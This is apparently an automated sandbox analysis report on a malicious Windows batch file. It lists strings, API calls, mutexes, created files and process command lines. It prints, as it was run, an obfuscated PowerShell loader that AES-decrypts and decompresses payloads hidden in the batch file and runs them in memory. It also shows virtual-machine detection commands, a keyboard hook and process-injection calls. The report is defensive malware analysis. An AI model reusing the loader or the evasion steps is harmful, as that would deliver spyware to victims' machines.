Source: lsass.exe, 00000027.00000002.2560755573.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1748299304.0000017D2D442000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746542706.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1753000627.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2563721606.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 00000029.00000000.1764744714.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000029.00000002.2625112996.00000262ED790000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.2553174289.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746323594.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 00000027.00000002.2551990722.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1746269910.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000027.00000002.2570444527.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.1754041394.0000017D2D5AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001C.00000002.2582592415.0000022F1DD57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, Null.14.dr	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.00000225433F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001F.00000002.1721914542.00000000048C1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000001C.00000002.2585583719.0000022F1E171000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000022.00000002.1740710530.000002254361C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.1721914542.0000000004B7E000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1740710530.0000022544537000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000022.00000002.1782893457.0000022553460000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: Q5N7WOpk8J.bat

Static file information: 5235007

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71DF98 NtUnmapViewOfSection,	34_2_00007FFAAC71DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC720F20 NtSetContextThread,	34_2_00007FFAAC720F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC720C5D NtWriteVirtualMemory,	34_2_00007FFAAC720C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC720FE4 NtResumeThread,	34_2_00007FFAAC720FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC720A3E NtUnmapViewOfSection,	34_2_00007FFAAC720A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71E078 NtUnmapViewOfSection,	34_2_00007FFAAC71E078
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	37_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	38_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,	39_2_0000017D2DD52300

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$cnt-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$cnt-onimai2\$cnt-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$cnt-onimai2\$cnt-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$cnt-sYvLLQ2I

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_czh1ayd4.gmu.ps1

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Code function: 21_3_000001F1197923F0	21_3_000001F1197923F0
Source: C:\Windows\System32\cmd.exe	Code function: 21_3_000001F11979CC94	21_3_000001F11979CC94
Source: C:\Windows\System32\cmd.exe	Code function: 21_3_000001F11979CE18	21_3_000001F11979CE18
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197D2FF0	21_2_000001F1197D2FF0
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DD894	21_2_000001F1197DD894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F1197DDA18	21_2_000001F1197DDA18
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5D894	21_2_000001F119D5D894
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D52FF0	21_2_000001F119D52FF0
Source: C:\Windows\System32\cmd.exe	Code function: 21_2_000001F119D5DA18	21_2_000001F119D5DA18
Source: C:\Windows\System32\conhost.exe	Code function: 22_3_00000166BBF7CC94	22_3_00000166BBF7CC94
Source: C:\Windows\System32\conhost.exe	Code function: 22_3_00000166BBF723F0	22_3_00000166BBF723F0
Source: C:\Windows\System32\conhost.exe	Code function: 22_3_00000166BBF7CE18	22_3_00000166BBF7CE18
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE492FF0	22_2_00000166BE492FF0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49D894	22_2_00000166BE49D894
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00000166BE49DA18	22_2_00000166BE49DA18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_04809B91	31_2_04809B91
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71DD58	34_2_00007FFAAC71DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71F63E	34_2_00007FFAAC71F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71F66B	34_2_00007FFAAC71F66B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71FDE9	34_2_00007FFAAC71FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71E329	34_2_00007FFAAC71E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC71DC35	34_2_00007FFAAC71DC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC9977E9	34_2_00007FFAAC9977E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC993362	34_2_00007FFAAC993362
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 34_2_00007FFAAC994E21	34_2_00007FFAAC994E21
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_00000279A924CC94	37_3_00000279A924CC94
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_00000279A92423F0	37_3_00000279A92423F0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_3_00000279A924CE18	37_3_00000279A924CE18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001CF0	37_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140002D4C	37_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140003204	37_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140002434	37_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_0000000140001274	37_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927D894	37_2_00000279A927D894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A9272FF0	37_2_00000279A9272FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A927DA18	37_2_00000279A927DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92AD894	37_2_00000279A92AD894
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92A2FF0	37_2_00000279A92A2FF0
Source: C:\Windows\System32\dllhost.exe	Code function: 37_2_00000279A92ADA18	37_2_00000279A92ADA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_000001CA7D1BCE18	38_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_000001CA7D1BCC94	38_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exe	Code function: 38_3_000001CA7D1B23F0	38_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1EDA18	38_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1ED894	38_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D1E2FF0	38_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21DA18	38_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D21D894	38_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe	Code function: 38_2_000001CA7D212FF0	38_2_000001CA7D212FF0
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_0000017D2DD2CE18	39_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_0000017D2DD2CC94	39_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exe	Code function: 39_3_0000017D2DD223F0	39_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5DA18	39_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD5D894	39_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD52FF0	39_2_0000017D2DD52FF0
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8DA18	39_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD8D894	39_2_0000017D2DD8D894
Source: C:\Windows\System32\lsass.exe	Code function: 39_2_0000017D2DD82FF0	39_2_0000017D2DD82FF0

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2446
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2441
Source: unknown	Process created: Commandline size = 5327
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2446	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2441	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 8084, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spyw.evad.winBAT@51/21@1/1

Source: C:\Windows\System32\dllhost.exe

Code function: 37_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

37_2_0000000140002D4C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 33_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

33_2_004011AD

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 33_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,

33_2_004017A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\de2c4de5-f170-45d0-bbf2-65b11fa7c60e
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xkid3nn.3jg.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: powershell.exe

String found in binary or memory: @{RootModule = 'PSReadLine.psm1'NestedModules = @("Microsoft.PowerShell.PSReadLine.dll")ModuleVersion = '2.0.0'GUID = '5714753b-2afd-4492-a5fd-01d9e2cff8b5'Author = 'Microsoft Corporation'CompanyName = 'Microsoft Corporation'Copyright = '(c) Microsoft Corporation. All rights reserved.'Description = 'Great command line editing in the PowerShell console host'PowerShellVersion = '5.0'DotNetFrameworkVersion = '4.6.1'CLRVersion = '4.0.0'FormatsToProcess = 'PSReadLine.format.ps1xml'AliasesToExport = @()FunctionsToExport = 'PSConsoleHostReadLine'CmdletsToExport = 'Get-PSReadLineKeyHandler','Set-PSReadLineKeyHandler','Remove-PSReadLineKeyHandler', 'Get-PSReadLineOption','Set-PSReadLineOption'HelpInfoURI = 'https://go.microsoft.com/fwlink/?LinkId=528806'PrivateData = @{ PSData = @{ Prerelease = 'beta2' } }}function PSConsoleHostReadLine{ Microsoft.PowerShell.Core\Set-StrictMode -Off [Microsoft.PowerShell.PSConsoleReadLine]::ReadLine($host.Runspace, $ExecutionContext)}prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml@{GUID="1DA87E53-152B-403E-98DC-74D7B4D63D59"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion = '5.1'CLRVersion="4.0"CmdletsToExport= "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Out-File", "Out-Printer", "Out-String", "Out-GridView", "Get-FormatData", "Export-FormatData", "ConvertFrom-Json", "ConvertTo-Json", "Invoke-RestMethod", "Invoke-WebRequest", "Register-ObjectEvent", "Register-EngineEvent", "Wait-Event", "Get-Event", "Remove-Event", "Get-EventSubscriber", "Unregister-Event", "New-Event", "Add-Member", "Add-Type", "Compare-Object", "ConvertTo-Html", "ConvertFrom-StringData", "Export-Csv", "Import-Csv", "ConvertTo-Csv", "ConvertFrom-Csv", "Export-Alias", "Invoke-Expression", "Get-Alias", "Get-Culture", "Get-Date", "Get-Host", "Get-Member", "Get-Random", "Get-UICulture", "Get-Unique", "Export-PSSession", "Import-PSSession", "Import-Alias", "Import-LocalizedData", "Select-String", "Measure-Object", "New-Alias", "New-TimeSpan", "Read-Host", "Set-Alias", "Set-Date", "Start-Sleep", "Tee-Object", "Measure-Command", "Update-List", "Update-TypeData", "Update-FormatData", "Remove-TypeData", "Get-TypeData", "Write-Host", "Write-Progress", "New-Object", "Select-Object", "Group-Object", "Sort-Object", "Get-Variable", "New-Variable", "Set-Variable", "Remove-Variable", "Clear-Variable", "Export-Clixml", "Import-Clixml", "ConvertTo-Xml", "Select-Xml", "Write-Debug", "Write-Verbose", "Write-Warning", "Write-Error", "Write-Information", "Write-Output", "Set-PSBreakpoint", "Get-PSBreakpoint", "Remove-PSBreakpoint", "Enable-PSBreakpoint", "Disable-PSBreakpoint", "Get-PSCallStack", "Send-MailMessag

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); 